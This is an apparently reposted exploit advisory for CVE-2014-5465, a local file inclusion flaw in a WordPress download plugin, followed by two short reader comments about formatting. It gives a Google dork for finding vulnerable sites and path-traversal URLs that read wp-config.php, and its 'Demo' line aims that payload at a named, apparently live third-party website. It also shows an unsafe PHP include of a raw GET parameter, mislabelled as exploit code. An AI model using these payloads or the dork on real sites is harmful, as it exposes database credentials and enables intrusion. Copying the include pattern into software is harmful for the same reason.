WordPress ShortCode Plugin - Local File Inclusion Vulnerability

# # Title : WordPress ShortCode Plugin - Local File Inclusion Vulnerability # Severity : High+/Critical # Reporter(s) : Mehdi Karout & Christian Galeone # Google Dork : inurl:wp/wp-content/force-download.php # Plugin Version : 1.1 # Plugin Name : Download ShortCode # Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip # Vendor Home : http://werdswords.com/ # Date : 25/08/2014 # Tested in : Win7 - Kali Linux # CVE : CVE-2014-5465 # # # PoC : # # # http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File] # # http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php # # Exploit Code : [php] $file = $_GET['file']; if(isset($file)) { include("pages/$file");//直接包含了 } else { include("index.php"); } [/php] # Demo : # # http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php

2 条评论

  1. 小飞

    样式有问题
    那个#########

    1. 0day5
      @小飞

      不是样式,而是复制的时候一起复制了

发表评论